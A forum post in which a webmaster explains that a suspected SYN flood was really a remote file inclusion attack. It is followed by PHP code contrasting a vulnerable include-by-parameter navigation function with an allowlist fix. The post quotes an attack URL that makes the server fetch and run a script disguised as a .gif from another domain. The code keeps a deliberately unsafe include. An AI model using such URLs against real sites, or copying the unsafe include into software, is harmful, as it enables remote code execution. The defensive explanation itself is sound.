I started a thread last week regarding trying to block some IPs that I
thought were sending a SYN flood to my server. The suggested action
(iptables) didn't seem to help.
It turns out the problem was a little different than I expected and I wanted
to let everyone know exactly what was happening.
What someone was doing was requesting the following URL on one of the server's
sites:
http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
But filename.gif is not a GIF; it is a text file with a script that sends a
SYN flood to some other server.
The ?active= part of the URL is the way the site was set up for navigation.
Although I design in PHP a lot, I haven't run across this particular
navigation setup. But in any event, it obviously opens the site to the
kind of exploiting behavior it was getting. I'm assuming some design
software set the navigation up this way and that once this is taken out
there shouldn't be a problem.
Has anyone else run across this?
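As an added illustration (not code from the original post or from the site in question), here is the include-by-parameter navigation pattern the post describes next to an allowlist-based replacement; the page names, the pages/ directory and the file names are assumptions.

```php
<?php
// Assumed layout (hypothetical): pages/home.php, pages/about.php, pages/contact.php

// The weak pattern: the request parameter goes straight into include().
// With allow_url_include enabled, PHP will fetch and execute a remote
// file named by the parameter, which is how a "gif" that is really PHP
// ends up running on the server. Kept here only to show what to look for.
function render_page_weak(): void
{
    $page = $_GET['active'] ?? 'home';
    include $page; // user-controlled local path or URL reaches include()
}

// Hardened pattern: map the parameter to a fixed allowlist of local files.
// Nothing from the request (no path, no URL, no extension) reaches include().
function resolve_page(string $requested): ?string
{
    static $pages = [
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
    return $pages[$requested] ?? null;
}

function render_page_hardened(): void
{
    $requested = (string)($_GET['active'] ?? 'home');
    $file = resolve_page($requested);
    if ($file === null) {
        // Log the rejected value (truncated) so attempts show up in the error log,
        // then serve a plain 404 instead of including anything.
        error_log('rejected navigation parameter: ' . substr($requested, 0, 200));
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include __DIR__ . '/pages/' . $file;
}

// Defence in depth, independent of the code fix: in php.ini set
//   allow_url_include = Off
//   allow_url_fopen   = Off   (if the site does not need remote fopen)
// so include() cannot pull remote files even if another parameter is missed.
render_page_hardened();
```

Grepping the site for `include`/`require` calls whose argument comes from `$_GET`, `$_POST` or `$_REQUEST` finds the other spots where the same design tool may have wired navigation this way.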